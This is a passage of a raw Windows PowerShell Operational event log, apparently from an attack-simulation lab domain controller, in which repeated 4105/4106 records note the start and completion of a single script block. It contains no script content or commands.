Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468007
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468006
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468005
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468004
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468003
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468002
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468001
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468000
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467999
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467998
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467997
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467996
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467995
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467994
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467993
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467992
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467991
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467990
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467989
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467988
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467987
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467986
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467985
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467984
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467983
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467982
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467981
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467980
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467979
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467978
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467977
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467976
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467975
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467974
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467973
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467972
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467971
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468233
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468232
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468231
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468230
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468229
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468228
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468227
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468226
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468225
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468224
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468223
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468222
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468221
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468220
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468219
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468218
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468217
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468216
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
